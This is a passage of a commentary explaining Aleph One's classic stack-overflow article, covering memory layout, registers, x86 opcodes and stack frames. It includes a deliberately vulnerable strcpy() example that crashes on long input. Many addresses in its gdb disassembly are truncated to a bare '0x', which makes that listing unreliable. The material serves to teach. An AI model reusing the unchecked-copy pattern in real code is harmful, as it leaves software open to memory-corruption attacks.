Smashing The Stack For Fun And Profit by Aleph One


Review of Aleph One's Smashing The Stack For Fun And Profit
by vangelis

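Aleph One's "Smashing the Stack for Fun and Profit" is the classic among classics on buffer overflows. Anyone who wants to become a capable hacker has to read widely, and studying system hacking without having read this article is unthinkable. It was published in Phrack on November 8, 1996, yet its influence still carries real weight: nearly every overflow-related text has been, and continues to be, written on top of it. It is therefore regrettable that no detailed commentary on it has been published so far.

Reading a classic is a pleasure, but understanding and analyzing it completely is not easy, because the weight of a classic is more than a commentary can comfortably bear. I am writing this analysis despite that burden for two reasons: first, to satisfy my own intellectual curiosity, and second, to give readers a little help in approaching the article.

Because the article is a classic, it pays to prepare before reading it. Reading it without background knowledge leads to a predictable result. To follow it properly you need basic assembly language, the concept of virtual memory, how to use gdb, and a solid understanding of buffers. C and Unix-like systems are of course prerequisites. Since nearly all of the tests in the article were run on Intel x86 CPUs under Linux, familiarity with Linux is essential too. I think the wise choice is to study first, using books and material available on the Internet, and then read this text. If you want to go fast, start unhurriedly!

Since this text is about buffer overflows, we first have to establish what a buffer is. A buffer is a contiguous block of computer memory holding data of the same type; in discussions of overflows it usually means a character array. You will know that arrays or functions such as malloc() are used to reserve space for strings. Character arrays belong to the very basics of C, so I will not explain them here. For deeper study, however,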

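readers of this text should review arrays once more. There is no shame in revisiting the basics.

Like other C variables, arrays can be declared static or dynamic. Declaring a variable means reserving the memory needed to hold a particular piece of data; a variable is a named data storage area in memory. Some variables are initialized with their data, while others are left uninitialized and receive data while the program runs. Most of the problem cases in this text involve uninitialized variables, which typically receive data passed as an argument into the space allocated for them. Anyone with a grounding in C knows how variables are classified, so I will not go through the classification separately and will explain only what is needed as we go.

Static variables are allocated in the data segment [4] at load time. Dynamic variables, by contrast, are allocated on the stack at run time. The focus of this text is the overflow of dynamic buffers, that is, stack-based overflows.

The following example uses a dynamic variable and, as readers can see at a glance, contains an overflow vulnerability. The dynamic variable in question is char buffer[10];. Its storage is created on the stack while the program runs and is filled with data supplied at run time, which is why it is called dynamic. The problem comes from the use of strcpy(): strcpy() does not check the size of the destination, so it can write more data than was allocated, and it is one of the classic sources of overflows. More on this later. The session below shows the source being written, compiled, and run, data being entered, and the resulting overflow.

    [vangelis@localhost test]$ vi example.c        <- write the source
    #include <stdio.h>

[4] A segment is a unit of data of variable size, as opposed to a page, whose size is fixed, used when data is swapped in and out of main memory. For the details of memory management I recommend Park Jang-su's book on the Linux 2.4 kernel, 리눅스 커널 분석 2.4.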

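    #include <string.h>

    main()
    {
        char buffer[10];
        char str[256];                  /* input area large enough to hold a string */

        printf("put strings into buffer:");
        scanf("%255s", str);
        strcpy(buffer, str);            /* no bounds check: long input overflows buffer */
    }
    [vangelis@localhost test]$ gcc -o example example.c        <- compile
    [vangelis@localhost test]$ ./example                       <- run the program
    Put strings into buffer :aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaa                                     <- data entered
    Segmentation fault                                         <- overflow occurs
    [vangelis@localhost test]$

Process memory organization

Above we took a brief look at buffers. To understand buffers properly, though, we first need to understand how a process [5] is organized in memory. In his article Aleph One describes the regions of a process fairly briefly, except for the stack, and his diagram is equally brief, because the article concentrates on stack overflows. I will follow the original faithfully while adding explanations of the other memory regions. A process is generally divided into three regions: text, data, and stack.

[5] A process is an instance of a program executing on the computer; put simply, a running program. In a multi-user environment such as Linux, two or more processes can exist for one program. If five users share one program and use it at the same time, there will basically be as many processes as users. If this is unclear, study how programs are used in a multi-user environment.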
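As a contrast to the strcpy() call in example.c, here is a minimal sketch of a copy that never writes past the destination. The helper name copy_bounded is hypothetical and is not part of the article; it relies only on the standard snprintf(), which truncates its output to the size it is given and reports how many characters the full string would have needed.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not from the article): copy src into dst without
 * ever writing more than dst_size bytes, including the terminating NUL.
 * Returns 0 if src fit completely, 1 if it had to be truncated. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return 1;                       /* nothing can be stored at all */

    /* snprintf() writes at most dst_size bytes and returns the length
     * the complete string would have had. */
    int needed = snprintf(dst, dst_size, "%s", src);

    return needed < 0 || (size_t)needed >= dst_size;
}
```

Called from main() as copy_bounded(buffer, sizeof buffer, str), this keeps the ten-byte buffer intact however long the input is; the price is that long input is cut off, which the return value lets the caller detect.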

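First, the text region. It contains the instructions (the program's machine code) and is read-only. Because it is read-only, an attempt to write to it causes a segmentation violation, also called a segmentation fault. A segmentation violation is the result of some form of illegal access to a region; you will meet these "forms of illegal access" again and again while studying overflows.

Next, the data region. It holds initialized and uninitialized data, and static variables are stored here. We distinguish several kinds of variables because scope matters: the scope of a variable determines its lifetime, how long its value is preserved in memory, and when its storage is allocated and released. The functions in a program work on data that is either held in variables or allocated while the program runs.

Variables divide broadly into external and local variables. A variable declared outside any function, before main(), is an external or global variable; a local variable is declared inside a particular function. Local variables are automatic by default, which means their values are not preserved between calls of the function that defines them. To preserve a value across calls, define the variable as a static variable with the static keyword. A static variable is initialized once and keeps its value from call to call. Compile and run the following source to see this for yourself.

    [vangelis@localhost test]$ vi static.c
    #include <stdio.h>

    void func(void);

    main()
    {
        int c;

        for (c = 0; c < 5; c++) {
            printf("c 가 %d 일때, ", c);
            func();
        }
        return 0;
    }

    void func(void)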

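    {
        static int a = 0;
        int b = 0;

        printf("a=%d, b=%d\n", a++, b++);
    }
    [vangelis@localhost test]$ gcc -o static static.c
    [vangelis@localhost test]$ ./static
    c가 0일때, a=0, b=0
    c가 1일때, a=1, b=0
    c가 2일때, a=2, b=0
    c가 3일때, a=3, b=0
    c가 4일때, a=4, b=0

In the source above, variable a carries the static keyword. The output shows its value increasing by 1 on every call, because the value has been preserved ever since it was initialized. Anyone who still does not follow after seeing the source and its output should study C first.

Two names come up together with the data region: data and bss. Both hold global variables and are allocated at compile time. The data region contains initialized static data, and the bss region contains uninitialized data. The size of this region can be changed with the brk system call [6]. If the memory available to these regions is exhausted, the running process is blocked and rescheduled to run again with a larger memory space, since a process cannot do its work without enough memory. New memory is added between the data and stack segments. Linux has several memory allocation mechanisms, but they are outside the scope of this text; I will mention them only where the discussion requires it.

[6] brk and sbrk dynamically change the amount of space allocated for the calling process's data segment. The change is made by resetting the process's break value and allocating the appropriate amount of space. The break value is the address of the first location beyond the end of the data segment. The amount of allocated space increases as the break value increases. Newly allocated space is set to zero; however, if the same memory is allocated to the same process again, its contents are undefined. The synopsis (a brief summary) of brk is:

    #include <unistd.h>
    int brk(void *endds);
    void *sbrk(ssize_t incr);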
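The break value described in footnote 6 can be observed directly. The sketch below is an illustration under assumptions, not something taken from the article: the helper name grow_break is hypothetical, the code assumes a Unix-like system whose C library still provides sbrk() (glibc declares it as void *sbrk(intptr_t), slightly different from the synopsis quoted above), and it assumes nothing else in the process moves the break between the calls.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE        /* asks glibc to declare sbrk(); platform assumption */
#endif
#include <stdint.h>
#include <unistd.h>

/* Hypothetical helper: move the program break by incr bytes and return
 * how far it actually moved, or -1 if sbrk() reported an error. */
long grow_break(long incr)
{
    char *before = sbrk(0);                 /* sbrk(0) reads the current break value */

    if (sbrk((intptr_t)incr) == (void *)-1)
        return -1;                          /* the kernel refused the request */

    char *after = sbrk(0);                  /* break value after the change */
    return (long)(after - before);
}
```

A call such as grow_break(4096) should report that the end of the data segment moved up by one page. Real programs normally leave the break to malloc(), so this is useful only as a way of watching the mechanism.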

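Since Aleph One's article deals with stack overflows, we now look at the stack in detail. Before that, here is one more diagram of the process memory layout discussed above.

    high addresses
    +------------------+
    |   env strings    |
    |   argv strings   |
    |   env pointers   |
    |   argv pointers  |
    |   argc           |
    +------------------+
    |   stack          |
    |     |            |
    |     v            |
    |                  |
    |     ^            |
    |     |            |
    |   heap           |
    +------------------+
    |   bss            |
    +------------------+
    |   data           |
    +------------------+
    |   text           |
    +------------------+
    low addresses

    [Table 1] Process memory layout

In the diagram the arrow at the stack points down and the arrow at the heap points up. The stack grows downward as it stores the arguments of a called function and that function's local variables (the usual expression is that the stack grows down, toward lower memory addresses, from virtual address 0xC). Meanwhile, a running program can obtain memory dynamically through library functions such as malloc(), and release it again with free(),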

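and this space is called the heap region. As the diagram shows, the heap occupies the area after the end of the data segment. The heap grows toward higher virtual addresses, which is why its arrow points up.

To understand the diagram better, look at the following program and work out where each of its elements is placed. The diagram is simplified. The table and source are taken from the book 리눅스 매니아를 위한 커널 프로그래밍 (조유근 and two co-authors, 교학사).

    #include <stdio.h>

    int a, b;
    int global_variable = 3;
    char buf[100];

    main(int argc, char *argv[])
    {
        int i = 1;
        int local_variable;

        a = i + 1;
        printf("a=%d\n", a);
    }

    high memory addresses
    +----------------+--------+----------------------------------+
    | kernel space   | kernel |                                  |
    +----------------+--------+----------------------------------+
    |                | stack  | argc, argv, i, local_variable    |
    | user space     | data   | a, b, global_variable            |
    |                | text   | a=i+1; printf("a=%d\n",a);       |
    +----------------+--------+----------------------------------+
    low memory addresses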
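The direction of stack growth shown in the diagrams can be checked on a real machine by comparing the address of a local variable in a caller with one in a function it calls. This is a rough sketch under assumptions: the function names are hypothetical, __attribute__((noinline)) is a GCC/Clang extension used so that the two variables really live in different stack frames, and the result describes only the platform it is run on.

```c
#include <stdint.h>

/* Callee half of the probe. noinline keeps this function in its own
 * stack frame, so its local is allocated after the caller's local. */
__attribute__((noinline))
static int callee_is_lower(uintptr_t caller_addr)
{
    volatile char probe = 0;                 /* lives in the callee's frame */
    return (uintptr_t)&probe < caller_addr;  /* lower address means "grew down" */
}

/* Returns 1 if a newer stack frame sits at a lower address than an older
 * one, that is, if the stack grows toward lower memory addresses. */
int stack_grows_down(void)
{
    volatile char marker = 0;                /* lives in the caller's frame */
    return callee_is_lower((uintptr_t)&marker);
}
```

On the x86 Linux systems discussed in this text the function is expected to return 1. The addresses are converted to integers before the comparison because comparing pointers to unrelated objects directly is not defined by the C standard.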

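What is a stack?

A stack is an abstract data type used frequently in computer science. Because it is abstract, you cannot see it as a physical object, so its structure and purpose have to be studied with that abstraction in mind. A stack has the property that the last object placed on it is the first to be removed. This property is usually called last in, first out, or LIFO.

Several operations are defined on a stack. The two most important are PUSH and POP. PUSH adds an element to the top of the stack; POP does the opposite and reduces the size of the stack by removing the last element from the top.

Understanding these operations requires some basic assembly language. Assembly is the language that gives you direct control over the computer. Information about it is widely available on the Internet. As a book for beginners I recommend Bob Neveln's Linux Assembly Language Programming. I do not know whether a translation has been published; if your English is up to it, read the original.

Why use a stack?

Modern computers are designed with high-level languages in mind. The most important technique for structuring programs introduced by high-level languages is the procedure [7], or function. From one point of view a procedure call alters the flow of control just as a jump [8] does, but unlike a jump, when the procedure has finished its task it returns control to the statement or instruction following the call. This is easy to see by following a function call in gdb. Let us walk through it with the following simple source.

    [vangelis@localhost test]$ cat > e.c

[7] In programming, procedure means almost the same as function. A function is an independent piece of code that performs a defined operation and hands a return value (result) back to the program that called it. Anyone who has studied C or another language needs no further explanation. Outside programming, a procedure is a series of steps for carrying out some task.

[8] A jump transfers execution to another location within a program; this is also called a branch, and the typical assembly instruction is jmp. Unlike a C function call, jmp does not record any return information.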

    #include <stdio.h>

    int a, b, c;
    int function(int, int);

    main()
    {
        printf("input a number for a: ");
        scanf("%d", &a);
        printf("input a number for b: ");
        scanf("%d", &b);
        c = function(a, b);
        printf("the value of a+b is %d", c);
        return 0;
    }

    int function(int a, int b)
    {
        c = a + b;      /* no return statement; the disassembly below shows the sum left in %eax */
    }
    [vangelis@localhost test]$ gcc -o e e.c
    [vangelis@localhost test]$ gdb e
    GNU gdb 5.3
    Copyright 2002 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "i686-pc-linux-gnu"...
    (gdb) disas main
    Dump of assembler code for function main:
    0x <main>:              push   %ebp
    0x <main+1>:            mov    %esp,%ebp
    0x <main+3>:            sub    $0x8,%esp
    0x <main+6>:            sub    $0xc,%esp

    0x <main+9>:            push   $0x
    0x804849e <main+14>:    call   0x <printf>
    0x80484a3 <main+19>:    add    $0x10,%esp
    0x80484a6 <main+22>:    sub    $0x8,%esp
    0x80484a9 <main+25>:    push   $0x
    0x80484ae <main+30>:    push   $0x80485af
    0x80484b3 <main+35>:    call   0x <scanf>
    0x80484b8 <main+40>:    add    $0x10,%esp
    0x80484bb <main+43>:    sub    $0xc,%esp
    0x80484be <main+46>:    push   $0x80485b2
    0x80484c3 <main+51>:    call   0x <printf>
    0x80484c8 <main+56>:    add    $0x10,%esp
    0x80484cb <main+59>:    sub    $0x8,%esp
    0x80484ce <main+62>:    push   $0x804970c
    0x80484d3 <main+67>:    push   $0x80485af
    0x80484d8 <main+72>:    call   0x <scanf>
    0x80484dd <main+77>:    add    $0x10,%esp
    0x80484e0 <main+80>:    sub    $0x8,%esp
    0x80484e3 <main+83>:    pushl  0x804970c
    0x80484e9 <main+89>:    pushl  0x
    0x80484ef <main+95>:    call   0x804851c <function>
    0x80484f4 <main+100>:   add    $0x10,%esp
    0x80484f7 <main+103>:   mov    %eax,%eax
    0x80484f9 <main+105>:   mov    %eax,0x
    0x80484fe <main+110>:   sub    $0x8,%esp
    0x <main+113>:          pushl  0x
    0x <main+119>:          push   $0x80485c9
    0x804850c <main+124>:   call   0x <printf>
    0x <main+129>:          add    $0x10,%esp
    0x <main+132>:          mov    $0x0,%eax
    0x <main+137>:          leave

    0x804851a <main+138>:       ret
    0x804851b <main+139>:       nop
    End of assembler dump.
    (gdb) disas function
    Dump of assembler code for function function:
    0x804851c <function>:       push   %ebp
    0x804851d <function+1>:     mov    %esp,%ebp
    0x804851f <function+3>:     mov    0xc(%ebp),%eax
    0x <function+6>:            add    0x8(%ebp),%eax
    0x <function+9>:            mov    %eax,0x
    0x804852a <function+14>:    pop    %ebp
    0x804852b <function+15>:    ret
    0x804852c <function+16>:    nop
    0x804852d <function+17>:    nop
    0x804852e <function+18>:    nop
    0x804852f <function+19>:    nop
    End of assembler dump.

The output shows that each function is called through a specific sequence of steps and instructions. That sequence is examined in detail in the shellcode section. This high-level abstraction can be implemented because of the stack. The stack is also used to dynamically allocate space for the local variables of a function, to pass parameters [9] to it, and to return values from it.

[9] A parameter appears in the function header and reserves a place that corresponds to an argument. A function's parameters are fixed and do not change while the program runs. An argument, by contrast, is the actual value passed to the function by the calling program, and a different argument value can be passed on every call. The function receives the value through the name of the corresponding parameter. In int function(int a, int b) from e.c above, the parameters are a and b, and the arguments are the values (int numbers) entered for a and b when the program runs.
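The PUSH and POP operations and the last in, first out property described earlier can be made concrete with a small array-backed stack. This is a generic teaching sketch, not the hardware stack itself; the type and function names are illustrative and do not come from the article.

```c
#include <stddef.h>

#define STACK_CAPACITY 16

/* Toy LIFO stack; all names here are illustrative. */
struct int_stack {
    int    items[STACK_CAPACITY];
    size_t count;                  /* number of stored elements; the top is items[count - 1] */
};

/* PUSH: add a value on top. Returns 0 on success, -1 if the stack is full. */
int stack_push(struct int_stack *s, int value)
{
    if (s->count == STACK_CAPACITY)
        return -1;
    s->items[s->count++] = value;
    return 0;
}

/* POP: remove the top value into *out. Returns 0 on success, -1 if empty. */
int stack_pop(struct int_stack *s, int *out)
{
    if (s->count == 0)
        return -1;
    *out = s->items[--s->count];
    return 0;
}
```

Pushing 1, 2, 3 and then popping three times yields 3, 2, 1: the element stored last comes out first, which is exactly the order in which nested function calls must be unwound.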

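Stack region

Let us now look at the stack region in more detail. To stress it again, Aleph One's article is about stack overflows specifically. A stack is a contiguous block of memory containing data. "Contiguous" means the stack is not scattered in fragments but occupies one continuous range of memory. A block here means a run of consecutive information, independent of the physical structure of main memory; the term mostly denotes the unit of information moved by a single I/O instruction.

A register called the stack pointer (SP) points to the top of the stack. The bottom of the stack is at a fixed address. The kernel adjusts the size of the stack dynamically at run time, because it depends on the amount of data; this was mentioned earlier in connection with memory allocation. At this point we need to know something about registers, so let us look at them briefly before moving on.

The most important part of a computer system is the CPU, because it performs the actual work, including arithmetic. The CPU executes programs: it not only carries out instructions but also controls the order in which they are executed. To do this it has hardware components such as the arithmetic logic unit (ALU), registers and flags, an internal bus, and the control unit (CU). Since registers are our subject, I will concentrate on them. Part of what follows is based on the book 컴퓨터 구조화 (조정완). I did not see a need to reproduce everything, so the treatment may lack some consistency and depth; readers should consult books or material with fuller explanations. Keep in mind that this text is not about registers as such.

A register is a storage element used to hold data or addresses, and flags indicate the status of the result of an operation. A register is built from flip-flops or latches connected in series. In summary, registers have the following characteristics.

    - They hold information needed to execute a program or produced during execution.
    - Information held in a register must be stored to main memory before it can be stored to disk.
    - Storing information, or using stored information, requires specifying an address.
    - The address used to specify a register is called the register address or register number.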

Now for the kinds of registers. There are two ways to classify them. The first divides them into visible registers, whose contents the programmer can change or use, and invisible registers, for which that is not possible. Visible registers include the arithmetic registers, index registers, and the program counter; invisible registers include the instruction register, the memory address register (MAR), and the memory buffer (data) register (MBR or MDR).

The second classification is by the kind of information stored: data registers, address registers, and status registers. The one that matters most for this text is the data register. A data register holds the data used when executing instructions that perform computation, so it can contain numbers, logical values, and characters. Data registers include the accumulator (AC), general-purpose registers (GPR), and the stack. Here we look only at the stack; consult the relevant books and documents for the others.

A stack is a structure in which stored information is processed in a special order: the reverse of the order in which it was stored. Implementing a stack with registers takes at least two data registers, and it always requires an address register, the stack pointer. An address register holds an address, the information needed to reach stored data. The stack pointer holds the address of the top of the stack, that is, the location of the item most recently stored. In this textbook model, storing an item increments SP by 1 and writes to the location SP then designates; reading an item accesses the location SP designates and then decrements SP by 1. (On x86 the direction is reversed: the stack grows toward lower addresses, so a push decreases the stack pointer.)

Before returning to Aleph One's article, here is a short summary of the registers that will help our study. Registers fall into four broad groups, and the e in front of each name stands for extended, meaning the register was widened from the 16-bit to the 32-bit architecture. The x86 architecture is assumed here.

1. General registers: mainly handle data; %eax, %ebx, %ecx, %edx, and so on.
2. Segment registers: hold the first part of a memory address; the 16-bit %cs, %ds, %ss, and so on.
3. Offset registers: hold an offset relative to a segment register.
   %eip (extended instruction pointer): address of the next instruction to be executed
   %ebp (extended base pointer): start of the environment for a function's local variables
   %esi (extended source index): source data offset in operations on memory blocks
   %edi (extended destination index): destination data offset in operations on memory blocks
   %esp (extended stack pointer): points to the top of the stack
4. Special registers: used by the CPU itself.

Theo Chakkapark summarizes the registers and the Intel x86 assembly opcodes as follows, which should be a useful reference.

General Purpose Registers

    Name                  32-bit    16-bit
    Accumulator           EAX       AX
    Base Register         EBX       BX
    Count Register        ECX       CX
    Data Register         EDX       DX
    Stack Pointer         ESP       SP
    Base Pointer          EBP       BP
    Source Index          ESI       SI
    Destination Index     EDI       DI
    Flags Register        EFlags    Flags
    Instruction Pointer   EIP       IP

Segment Registers

    Name                  Register

    Code Segment          CS
    Data Segment          DS
    Stack Segment         SS
    Extra Segment         ES
                          FS
                          GS

EFlags Register

    Bit      Flag    Description
    0        CF      Carry Flag
    1        1       None
    2        PF      Parity Flag
    3        0       None
    4        AF      Aux. Carry
    5        0       None
    6        ZF      Zero Flag
    7        SF      Sign Flag
    8        TF      Trap Flag
    9        IF      Interrupt Enable Flag
    10       DF      Direction Flag
    11       OF      Overflow Flag
    12-13    IOPL    I/O Privilege Level
    14       NT      Nested Task
    15       0       None
    16       RF      Resume Flag
    17       VM      Virtual-8086 Mode
    18       AC      Alignment Check
    19       VIF     Virtual Interrupt Flag
    20       VIP     Virtual Interrupt Pending
    21       ID      Identification Flag
    22-31    0       None

Operand Abbreviations

    Abbreviation    Meaning
    acc             Register AL, AX, or EAX
    dst             A register or memory location
    src             A register, memory location, or a constant
    reg             Any register other than a segment register
    segreg          Visible part of CS, DS, SS, ES, FS, or GS
    imm             A constant
    mem             A memory location
    gdt             Global Descriptor Table

    idt             Interrupt Descriptor Table
    port            An input or output port

Movement Instructions

    OPCode   Operands                                   Operation
    MOV      dst, src                                   dst <- src
    MOVZX    reg16, src8 / reg32, src8 / reg32, src16   reg <- zero-extended src
    MOVSX    reg16, src8 / reg32, src8 / reg32, src16   reg <- sign-extended src
    LEA      reg32, mem                                 reg32 <- offset(mem)
    XCHG     dst, src                                   temp <- dst; dst <- src; src <- temp

Stack Instructions

    OPCode   Operands                 Operation
    PUSH     BYTE imm8                ESP <- ESP - 4; mem32[ESP] <- sign-extended imm8
    PUSH     WORD imm16               ESP <- ESP - 2; mem16[ESP] <- imm16
    PUSH     DWORD imm32              ESP <- ESP - 4; mem32[ESP] <- imm32
    PUSH     src16 / src32 / segreg   ESP <- ESP - sizeof(src); mem[ESP] <- src
    POP      src16 / src32 / segreg   dst <- mem[ESP]; ESP <- ESP + sizeof(dst)
    PUSHF    None                     ESP <- ESP - 4; mem32[ESP] <- EFlags
    POPF     None                     EFlags <- mem32[ESP]; ESP <- ESP + 4
    PUSHA    None                     Pushes EAX, ECX, EDX, EBX, orig. ESP, EBP, ESI, EDI
    POPA     None                     Pops EDI, ESI, EBP, ESP (discard), EBX, EDX, ECX, EAX
    ENTER    imm16, 0                 Push EBP; EBP <- ESP; ESP <- ESP - imm16
    LEAVE    None                     ESP <- EBP; pop EBP

Addition and Subtraction Instructions

    OPCode   Operands    Operation                Flags
    ADD      dst, src    dst <- dst + src         OF, SF, ZF, AF, CF, PF
    ADC      dst, src    dst <- dst + src + CF

    SUB      dst, src    dst <- dst - src
    SBB      dst, src    dst <- dst - src - CF
    CMP      dst, src    dst - src; numeric result discarded
    INC      dst         dst <- dst + 1           OF, SF, ZF, AF, PF
    DEC      dst         dst <- dst - 1
    NEG      dst         dst <- -dst              OF, SF, ZF, AF, PF; CF = 0 iff dst is 0

Multiply and Divide Instructions

    OPCode   Operand   Operation                             Comment                           Flags
    MUL      src8      AX <- AL x src8                       Use MUL with unsigned operands.   Sets CF & OF if product
             src16     DX.AX <- AX x src16                                                     overflows lower half
             src32     EDX.EAX <- EAX x src32
    IMUL     src8      AX <- AL x src8                       Use IMUL with signed operands.
             src16     DX.AX <- AX x src16
             src32     EDX.EAX <- EAX x src32
    DIV      src8      AL <- quotient(AX / src8)             Use DIV with unsigned operands.   OF, SF, ZF, AF, CF, PF
             src16     AX <- quotient(DX.AX / src16)                                           become undefined
             src32     EAX <- quotient(EDX.EAX / src32)
    IDIV     src8      AL <- quotient(AX / src8)             Use IDIV with signed operands.
             src16     AX <- quotient(DX.AX / src16)
             src32     EAX <- quotient(EDX.EAX / src32)
    CBW      None      AX <- sign-extended AL                None                              None
    CWD      None      DX.AX <- sign-extended AX             None                              None
    CDQ      None      EDX.EAX <- sign-extended EAX          None                              None
    CWDE     None      EAX <- sign-extended AX               None                              None

Bitwise Instructions

    OPCode   Operands    Operation                               Flags
    AND      dst, src    dst <- dst & src                        SF, ZF, PF
    OR       dst, src    dst <- dst | src                        (OF, CF are cleared,
    XOR      dst, src    dst <- dst ^ src                        AF becomes undefined)
    TEST     dst, src    dst & src; bitwise result discarded
    NOT      dst         dst <- ~dst                             None

Jump Instructions

    OPCode       Operand   Operation                                      Comment                                  Flags
    JMP          label     Jump to label                                                                           None
    JA / JNBE    label     Jump if above / Jump if not below or equal     Use when comparing unsigned operands.    None
    JAE / JNB    label     Jump if above or equal / Jump if not below
    JBE / JNA    label     Jump if below or equal / Jump if not above
    JB / JNAE    label     Jump if below / Jump if not above or equal
    JG / JNLE    label     Jump if greater / Jump if not less or equal    Use when comparing signed operands.      None
    JGE / JNL    label     Jump if greater or equal / Jump if not less
    JLE / JNG    label     Jump if less or equal / Jump if not greater
    JL / JNGE    label     Jump if less / Jump if not greater or equal
    JE / JZ      label     Jump if equal / Jump if zero (ZF = 1)          Equality comparisons                     None
    JNE / JNZ    label     Jump if not equal / not zero (ZF = 0)
    JC           label     Jump if CF = 1                                                                          None
    JNC          label     Jump if CF = 0                                                                          None
    JS           label     Jump if SF = 1                                                                          None
    JNS          label     Jump if SF = 0                                                                          None

Now back to Aleph One's article. We pick up at the second paragraph, following the first one covered above. Some material will repeat what was already discussed; do not let that bother you.

The stack consists of logical stack frames that are pushed when a function is called and popped when it returns. We saw this in the gdb output earlier and will look at it more closely later. A stack frame contains the parameters to the function, its local variables, and the data needed to recover the previous stack frame, including the value of the instruction pointer (IP) at the time of the call. This too we confirmed in the diagram earlier; if it is confusing, go back and reread that part.

Depending on the implementation, the stack grows either down (toward lower memory addresses) or up. Aleph One's article uses Intel x86 CPUs and Linux for its tests, and Intel x86 CPUs implement a stack that grows down. Motorola, SPARC, and MIPS [11] processors use the same approach. I have never used Motorola or MIPS CPUs, and so I will not make irresponsible statements about them. If by any chance

[11] See Phrack issue 56, "Writing MIPS/IRIX Shellcode".

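you are interested, please check for yourself. Readers who want to know more about the stack and registers on SPARC systems should see the article "Understanding stacks and registers in the Sparc architecture(s)".

Like the stack itself, the stack pointer (SP) depends on the implementation and can differ between architectures. Since this text is based on Intel x86 CPUs, keep in mind while reading that SP points to the last address on the stack.

Next, the frame pointer (FP). Besides SP, the register that points to the top of the stack, a frame pointer is used to implement the stack. FP points to a fixed location within the logical stack frame, and because that location is fixed it offers conveniences SP does not. In principle, local variables could be referenced by giving their offsets [13] from SP. But as words are pushed onto and popped off the stack, these offsets change. In some cases the compiler can keep track of the number of words on the stack, but in others it cannot. Moreover, on some processors, such as Intel-based ones, accessing a variable at a known distance from SP requires multiple instructions. For these reasons many compilers use a second register, FP, to reference local variables and parameters, because their distances from FP do not change with pushes and pops. On Intel CPUs, BP (EBP) serves as FP. Because the stack grows down on Intel CPUs, actual parameters have positive offsets from FP and local variables have negative offsets. This becomes visible in the shape of the stack when function() is called below, where I will explain it once more.

The first thing a procedure does when called is save the previous frame pointer, so that it can be restored when the procedure exits. If it were not restored, the caller could no longer find its own local variables and parameters once the call returned. The next step copies the stack pointer into the frame pointer to create the new frame pointer, and then subtracts the size of the local variables from the stack pointer to reserve space for them. This sequence is usually called the procedure prolog. By contrast, when a procedure

[13] An offset is the value added to a base address to form another address. For example, if base address a is 100 and the new address b is 150, the offset is 50. Expressing an address by means of an offset is called relative addressing.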

exits, the stack is cleaned up to return to the original state. This is usually called the procedure epilog. Details follow shortly. I will first explain using the content of the original article, and then present and explain the results from my own system. Consider the following source.

    example1.c

    void function(int a, int b, int c){
        char buffer1[5];
        char buffer2[10];
    }

    void main(){
        function(1,2,3);
    }

To see what the program does in order to call function(), compile with the -S switch, which produces the assembly code. For reference, the GNU C compiler's compilation stages are as follows, for a source file named prog.c:

    Source code  ->  Translation unit  ->  Assembly  ->  Object  ->  Executable file
    prog.c           prog.i                prog.s        prog.o      a.out (prog)

Compile the source above as follows.

    $ gcc -S -o example1.s example1.c

The resulting example1.s contains the following part.

    pushl $3
    pushl $2
    pushl $1
    call function
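The effect of these four instructions, together with the first two steps of the procedure prolog described earlier (save the old frame pointer, then copy the stack pointer into the frame pointer), can be replayed on a simulated stack. This is a simplified model under assumptions, not the processor's actual behavior: memory is an array of 32-bit words, the struct and function names are invented for illustration, and the return address passed in is an arbitrary placeholder value.

```c
#include <stdint.h>

#define SIM_WORDS 64

/* Simulated 32-bit machine state; all names here are illustrative. */
struct sim_cpu {
    uint32_t mem[SIM_WORDS];   /* simulated stack memory, one slot per 4-byte word */
    uint32_t esp;              /* byte offset of the top of the stack */
    uint32_t ebp;              /* byte offset used as the frame pointer */
};

/* push: the stack grows toward lower addresses, so ESP drops by 4 first. */
static void sim_push(struct sim_cpu *cpu, uint32_t value)
{
    cpu->esp -= 4;
    cpu->mem[cpu->esp / 4] = value;
}

/* Read the 32-bit word stored at a simulated byte address. */
static uint32_t sim_load(const struct sim_cpu *cpu, uint32_t addr)
{
    return cpu->mem[addr / 4];
}

/* Replays: pushl $3; pushl $2; pushl $1; call function;
 * then the prolog steps push %ebp and mov %esp,%ebp. */
void sim_call_function(struct sim_cpu *cpu, uint32_t return_address)
{
    sim_push(cpu, 3);                 /* last argument goes first */
    sim_push(cpu, 2);
    sim_push(cpu, 1);
    sim_push(cpu, return_address);    /* what call does before jumping */
    sim_push(cpu, cpu->ebp);          /* prolog: save the old frame pointer */
    cpu->ebp = cpu->esp;              /* prolog: establish the new frame pointer */
}

/* Parameter number index (0 for a, 1 for b, 2 for c) as seen from the new frame:
 * the saved frame pointer and the return address occupy the first 8 bytes. */
uint32_t sim_param(const struct sim_cpu *cpu, unsigned index)
{
    return sim_load(cpu, cpu->ebp + 8 + 4 * index);
}
```

Starting from an empty stack with esp and ebp both set to SIM_WORDS * 4, the parameters end up at positive offsets from the frame pointer (+8, +12, +16), with the return address at +4. Pushing the arguments in reverse order is what places the first parameter closest to the frame pointer.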

This pushes the three arguments to the function onto the stack in reverse order and then calls the function. For readers short on basics, arguments and parameters once more: in void function(int a, int b, int c), a, b, and c are parameters, and in function(1,2,3) the values 1, 2, and 3 that are assigned to those parameters are arguments.

The call instruction in call function pushes the instruction pointer (IP) onto the stack. We will call this saved IP the return address (RET). The first thing done after the call is the procedure prolog mentioned earlier:

    push %ebp
    mov  %esp,%ebp
    sub  $20,%esp

First ebp, which is used as the frame pointer, is pushed onto the stack (push %ebp). As already noted, a frame pointer is used because its fixed position is convenient for referencing local variables and parameters. The current SP is then copied into EBP, which makes it the new frame pointer (mov %esp,%ebp). From here on, the old frame pointer value that was pushed onto the stack is called the saved FP (SFP, Saved Frame Pointer). Finally, space for the local variables is allocated by subtracting their size from SP (sub $20,%esp), since the function needs somewhere to keep them.

That is the procedure prolog. It reserves 20 bytes for the local variables because memory is allocated in multiples of the word size. One word is 4 bytes (32 bits), so buffer1[5] actually occupies 8 bytes and buffer2[10] occupies 12 bytes, and 20 bytes are subtracted from SP. In table form:

    [ buffer1 ]
